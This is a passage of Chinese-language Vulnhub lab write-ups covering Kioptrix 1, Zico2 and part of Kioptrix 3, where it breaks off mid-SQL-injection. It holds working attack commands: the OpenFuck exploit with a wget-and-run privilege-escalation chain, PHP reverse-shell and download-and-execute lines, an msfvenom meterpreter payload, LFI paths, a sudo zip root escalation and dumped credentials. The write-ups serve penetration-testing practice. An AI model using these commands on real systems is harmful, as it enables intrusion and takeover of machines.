src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9950' class='md-header-anchor '></a>思路总结</h2><h3><a name='header-n9951' class='md-header-anchor '></a>突破点和坑</h3><p>1.没有突破点的时候,就尝试暴破已知用户名的密码,字典采用国外密码字段较好。</p><p>2.Linux反弹shell有多种姿势,bash、nc、php、Python等都需要尝试。</p><p>3.需熟悉WordPress后台getshell姿势。</p><p>4.靶机作者提示有多种方法,肯定还有其他方法,本次渗透使用了暴破ssh用户和WordPress渗透两种方法。</p><p> </p><h1><a name='header-n9962' class='md-header-anchor '></a>第十三节 Kioptrix 1</h1><hr /><p>title: Vulnhub渗透测试练习-Kioptrix 1
date: 2018-05-07 15:28:05
categories: 笔记</p><h2><a name='header-n9965' class='md-header-anchor '></a>作者:Ukonw</h2><h2><a name='header-n9969' class='md-header-anchor '></a>信息收集</h2><p>通过<code>netdiscover</code>发现目标主机IP地址。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# netdiscover </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> Currently scanning: 192.168.63.0/16   |   Screen View: Unique Hosts         </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                                                                             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> _____________________________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> -----------------------------------------------------------------------------</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.1    ac:c1:ee:31:3f:25      1      60  Xiaomi Communications Co L</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.33   44:03:2c:68:d8:0f      1      60  Intel Corporate           </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.54   00:0c:29:7c:3a:16      1      60  VMware, Inc.                     </span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>从扫描信息的得的目标主机的IP地址为<code>192.168.43.54</code></p><p>nmap 扫描IP的端口信息<code>nmap -A 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS 192.168.43.54
 
Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.54
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
 
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.43.54
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds
</pre><p><code>443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)</code></p><p>443端口的服务<code>mod_ssl/2.8.4 OpenSSL/0.9.6b</code></p><p>通过<code>searchsploit mod_ssl</code>查询相关漏洞</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~/Desktop# searchsploit mod_ssl
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
 
</pre><p>这里可以利用第4个漏洞的exp脚本进行攻击,<code>exploit-db</code>下载相关exp。</p><h2><a name='header-n9987' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n9988' class='md-header-anchor '></a>OpenFuck漏洞利用</h3><p>这是一个远程溢出的漏洞,下载的exp比较久远需要做一些修改。</p><ul><li>编译需要用的<code>libssl-dev</code>库,且版本为<code>apt-get install libssl1.0-dev</code>
在exp中加入头文件<code><openssl/rc4.h></code>和<code><openssl/md5.h></code>
    替换exp中的<code>wget</code>后的url为<code>http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</code>
    第961行,修改为<code>const unsigned char * p,* end;</code></li></ul><p>然后编译</p><pre class="md-fences mock-cm md-end-block" lang="">gcc -o OpenFuck 764.c -lcrypto
</pre><p>运行脚本<code>./OpenFuck</code>选择相应我系统版本</p><p>这里选择 0x6b</p><p>执行相关的命令<code>./OpenFuck 0x6b 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54
 
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
 
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80e0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--04:04:37--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--04:04:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
 
    0K ...                                                   100% @   3.74 MB/s
 
04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
 
[+] Attached to 6498
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
</pre><h3><a name='header-n10008' class='md-header-anchor '></a>Samba漏洞利用</h3><p>实验环境是存在一个samba漏洞的,</p><p>这里用到<code>enum4linux</code>其利用SMB协议枚举Windows系统和SAMBA服务,以此来获得目标系统大量的重要信息,其枚举结果可能包含目标系统的用户帐号、组帐号、共享目录、密码策略等机密重要信息。</p><p>但我本地环境没有检测到samba的版本</p><p>该漏洞为<code>Samba trans2open溢出(Linux x86)</code>在Samba 2.2.0到2.2.8版本中发现的缓冲区溢出.</p><p>同样可以在<code>searchsploit</code>查到</p><p>这里直接用msf环境进行实验。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf exploit(linux/samba/trans2open) > show options 
 
Module options (exploit/linux/samba/trans2open):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.43.54   yes       The target address
   RPORT  139              yes       The target port (TCP)
 
 
Payload options (linux/x86/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.54   no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
 
msf exploit(linux/samba/trans2open) > exploit
 
[*] Started bind handler
[*] 192.168.43.54:139 - Trying return address 0xbffffdfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffcfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffbfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffafc...
[*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400
 
id
uid=0(root) gid=0(root) groups=99(nobody)
</pre><h2><a name='header-n10023' class='md-header-anchor '></a>总结</h2><p>虽然说这个实验环境比较老,一些漏洞可能在现实的实战中是很少存在的。但是在这个漏洞利用的过程中可以学到一些<code>kali linux</code>的工具的利用和一些实战的思路。</p><p> </p><h1><a name='header-n10028' class='md-header-anchor '></a>第十四节  Zico2</h1><hr /><p>title: Vulnhub渗透测试练习 - Zico2
date: 2018-05-05 22:30:35
categories: 笔记</p><h2><a name='header-n10031' class='md-header-anchor '></a>作者:Ukonw</h2><h2><a name='header-n10035' class='md-header-anchor '></a>vulnhub渗透环境</h2><h3><a name='header-n10036' class='md-header-anchor '></a>靶机地址</h3><p><a href='https://www.vulnhub.com/entry/zico2-1,210' target='_blank' class='url'>https://www.vulnhub.com/entry/zico2-1,210</a>/</p><h3><a name='header-n10039' class='md-header-anchor '></a>练习环境</h3><ul><li>Kali Linux 
VirtualBox</li></ul><h2><a name='header-n10045' class='md-header-anchor '></a>信息收集</h2><p>在信息收集之前需要获取到靶机的IP地址,我靶机在VirtualBox下是<code>Host-Only</code>网络模式,而靶机是无法直接进入系统看到IP地址的。</p><p>这里用到一个kali linux下的一个工具<code>netdiscover</code>基于ARP的网络扫描工具。</p><p>直接执行命令<code>netdiscover</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505223944.png' alt='' referrerPolicy='no-referrer' /></p><p>这里我们获取到两个IP地址,测试发现正确的是<code>192.168.56.102</code></p><p>接下来用<code>nmap</code>扫描端口信息</p><p><code>nmap -A 192.168.56.102</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505224409.png' alt='' referrerPolicy='no-referrer' /></p><p>得到80端口上运行着一个Web服务器。</p><p>访问该Web服务,在这个时候我们可以用常见的扫描工具对网站进行扫描</p><h2><a name='header-n10066' class='md-header-anchor '></a>漏洞利用</h2><p>这里我简单对页面进行浏览,发现了一个文件包含漏洞。</p><pre class="md-fences mock-cm md-end-block" lang="">view.php?page=tools.html
</pre><p>尝试包含<code>../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_1.png' alt='' referrerPolicy='no-referrer' /></p><p>成功包含,解下来就尝试扫描目录,因为校园网的原因,只能用<code>Host-Only</code>网络模式进行测试,所以一切测试过程都在<code>Kali</code>下进行</p><p>这里尝试去扫描网站的目录,用到<code>kali</code>下的<code>dirb</code>专门用于爆破目录的工具。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_2.png' alt='' referrerPolicy='no-referrer' /></p><p>得到一个<code>dbadmin</code>的目录</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_3.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_4.png' alt='' referrerPolicy='no-referrer' /></p><p>这里用到的是一个叫<code>phpLiteAdmin</code>服务器应用,版本号为<code>v1.9.3</code></p><p>尝试找找这个版本的历史漏洞,这个服务是存在一个远程PHP代码注入漏洞的。</p><p>这里可以通过搜索引擎搜索相关漏洞详情也可以用<code>kali</code>下的<code>Searchsploit</code>一个用于Exploit-DB的命令行搜索工具。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_5.png' alt='' referrerPolicy='no-referrer' /></p><p>这样们就可以看到漏洞详情,这里我们可以看到利用这个远程PHP代码注入漏洞需要登录的。</p><p>所以尝试默认密码<code>admin</code>,发现可以直接登录进去。</p><p>从<code>exploit-db</code>上的资料可以看出,我们需要创建一个数据库,写入一个shell。</p><p>这里可以用nc监听端口来反弹shell,也可以用msf生成php目录进行监听。</p><p>按照<code>exploit-db</code>所说的建立数据库。这里直接创建一个后缀名为<code>.php</code>的数据库<code>shell</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_6.png' alt='' referrerPolicy='no-referrer' /></p><p>并添加表信息</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_7.png' alt='' referrerPolicy='no-referrer' /></p><p>这里在本地的<code>/var/www/html</code>目录下创建txt文件</p><pre class="md-fences mock-cm md-end-block" lang=""><?php $sock=fsockopen("192.168.56.101",2333);exec("/bin/sh -i <&3 >&3 2>&3");?>
</pre><p>然后启动apache web服务器</p><pre class="md-fences mock-cm md-end-block" lang="">service apache2 start
</pre><p>然后返回到数据库中添加字段名,类型为<code>TEXT</code>,写入PHP代码来下载执行shell</p><pre class="md-fences mock-cm md-end-block" lang=""><?php system("wget 192.168.56.101/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_8.png' alt='' referrerPolicy='no-referrer' /></p><p>需要让目标下载执行这串恶意代码,需要一个HTTP请求。</p><p>这里我们就可以利用到之前发现的本地文件包含的漏洞了。</p><p>我们可以在数据库中发现我们恶意创建的数据库的路径</p><pre class="md-fences mock-cm md-end-block" lang="">/usr/databases/shell.php
</pre><p>先用nc监听我们之前设置的端口<code>2333</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_9.png' alt='' referrerPolicy='no-referrer' /></p><p>这里我们就可以反弹一个shell了。</p><h2><a name='header-n10134' class='md-header-anchor '></a>权限提升</h2><p>在反弹了shell后,对目录进行检查发现了</p><p>/home/zico中有一个<code>wordpress</code>目录,是一个常见的CMS</p><p>进入查看wp-config.php文件。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_10.png' alt='' referrerPolicy='no-referrer' /></p><p>发现了用户zico的登录凭证,我们可以用<code>ssh</code>来连接。</p><pre class="md-fences mock-cm md-end-block" lang="">ssh zico@192.168.56.102
</pre><p>利用<code>sudo -l</code>查看目前用户可执行与无法执行的指令;</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_11.png' alt='' referrerPolicy='no-referrer' /></p><p>这里表明当前用户<code>zico</code>可以利用root权限无密码执行<code>tar</code>和<code>zip</code>命令</p><p>这里可以利用<code>touch exploit</code>创建一个随机文件,并用<code>zip</code>命令进行压缩</p><pre class="md-fences mock-cm md-end-block" lang="">sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
</pre><ul><li>sudo 用管理员权限执行
-T 检查文件的完整性。这个参数可以让他执行下一个参数 --unzip-command,在这个参数中写入一个python的交互shell</li></ul><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_12.png' alt='' referrerPolicy='no-referrer' /></p><p>由此的到<code>root</code>权限,接下来就可以进入<code>/root</code>目录了</p><p><code>cat /root/flag.txt</code>得到flag。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_13.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10169' class='md-header-anchor '></a>总结</h2><ul><li>vulnhub里面有很多不同的环境提供渗透,第一次完成一次完整的渗透过程,学到了很多东西。
在文章的开头用到了<code>kali linux</code>下的一个工具<code>netdiscover</code>基于ARP的网络扫描工具。记得在一个师傅的面试经验介绍中,他被面试官问到为什么要用arp去探测内网主机,他回答的是相当隐蔽,探测的信息更准确。主要是因为传统探测远程主机是否存活的方法是通过ICMP协议中的回显应答报文来探测(ping)。很多主机为了避免被扫描器探测,通过防火墙将ICMP包屏蔽,从而达到在网络中隐藏的目的。
    在文章中用到了两种语言的交互shell。分别是php和python,这里参考老外的博客<a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Reverse Shell Cheat Sheet</a>
    对于我个人在提权实战经验方面是十分少的,在这次练习中学到了可以利用<code>touch exploit</code>创建一个随机文件,并用<code>zip</code>命令进行压缩,由此可见还是自己的实战经验太少了。
    最后感概下,英文的重要性。国外很多大牛的博客都是很丰富的,而对于一个英语四级425飘过的菜鸡,我也是很无奈的。只能靠百度翻译了。</li></ul><p> </p><h1><a name='header-n10180' class='md-header-anchor '></a>第十五节 Kioptrix 3</h1><hr /><p>title: Vulnhub渗透测试练习-Kioptrix 3
date: 2018-05-08 20:01:26
categories: 笔记</p><h2><a name='header-n10183' class='md-header-anchor '></a>作者:Ukonw</h2><h2><a name='header-n10187' class='md-header-anchor '></a>信息收集</h2><p>同样用<code>netdiscover</code>发现目标主机。</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 
 
 Currently scanning: 192.168.194.0/16   |   Screen View: Unique Hosts          
                                                                                
 13 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 780              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      6     360  Xiaomi Communications Co Ltd
 192.168.43.33   44:03:2c:68:d8:0f      2     120  Intel Corporate             
 192.168.43.58   00:0c:29:b2:76:40      4     240  VMware, Inc.                
 192.168.43.158  00:0c:29:38:2d:6f      1      60  VMware, Inc. 
</pre><p>目标IP为<code>192.168.43.158</code>。</p><p>用nmap扫描目标主机端口信息。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.43.158
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
 
</pre><p>由扫描信息可以得到</p><ul><li>22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    OS details: Linux 2.6.9 - 2.6.33</li></ul><p> </p><p>80端口可以看出cms为<code>Lotus CMS</code>。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_4.png' alt='' referrerPolicy='no-referrer' /></p><p>用<code>dirb</code>扫描一下网站目录。也可以用御剑扫描目录。发现存在<code>phpdamin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_5.png' alt='' referrerPolicy='no-referrer' /></p><p>cms后台<code>http://192.168.43.158/index.php?system=Admin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10218' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n10220' class='md-header-anchor '></a>文件包含&后台上传</h3><p>访问80端口上的WEB服务。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_1.png' alt='' referrerPolicy='no-referrer' /></p><p>发现url中有点问题</p><p><code>http://192.168.43.158/index.php?system=Blog</code></p><p>尝试<code>system=../../../../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_2.png' alt='' referrerPolicy='no-referrer' /></p><p>好像不行,尝试<code>%00.</code>截断,发现可以读到<code>/etc/passwd</code></p><p><code>http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_3.png' alt='' referrerPolicy='no-referrer' /></p><p>这里可以结合后面SQLmap跑出来的后台密码得到了一个shell。</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
</pre><p>用<code>msfvenom</code>生成一个图片马</p><p>我们在后台上传图片的地方上传一个图片</p><p>修改已有的图片,并得到图片的名,</p><p>利用msf监听端口</p><p>利用文件包含,包含上传图片,这个地方比较鸡肋。因为这个绝对路径我们是得不到的。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.
</pre><p>访问返回一个shell。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
 
[*] Started reverse TCP handler on 192.168.43.177:443 
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400
 
meterpreter > ls
Listing: /home/www/kioptrix3.com
================================
 
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 09:21:17 -0400  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  core
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  data
100644/rw-r--r--  23126  fil   2011-04-14 12:23:13 -0400  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 11:32:31 -0400  gallery
100644/rw-r--r--  26430  fil   2011-04-14 12:23:13 -0400  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 12:23:13 -0400  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  style
100644/rw-r--r--  243    fil   2011-04-14 12:23:13 -0400  update.php
</pre><p>权限有点小,很多命令都执行不了的。</p><h3><a name='header-n10259' class='md-header-anchor '></a>SQLmap进行SQL注入</h3><p>这个站是有的链接有问题,302跳转到<code>kioptrix3.com</code></p><p>在<code>etc/passwd</code>添加</p><pre class="md-fences mock-cm md-end-block" lang="">192.168.43.158  kioptrix3.com
</pre><p><code>service networking restart</code>重启服务</p><p>发现url存在SQL注入。<code>kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_7.png' alt='' referrerPolicy='no-referrer' /></p><p>先用<code>sqlmap</code>进行注入测试,id存在报错注入。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_8.png' alt='' referrerPolicy='no-referrer' /></p><p>尝试查找下后台管理员账号密码。</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>得到管理员账号密码,但是在</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><p>无法登录,另外找到一个登录的地方<code>http://kioptrix3.com/gallery/gadmin/</code></p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin    | n0t7t1k4 |
+----------+----------+
 
</pre><p>但是可以登录。</p><p>这里虽然可以是<code>root</code>和<code>dba</code>权限,但是没有绝对路径。不能直接用sqlmap进行写shell。</p><h3><a name='header-n10291' class='md-header-anchor '></a>手注sqli</h3><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#
</pre><p>判断一共有6列</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#
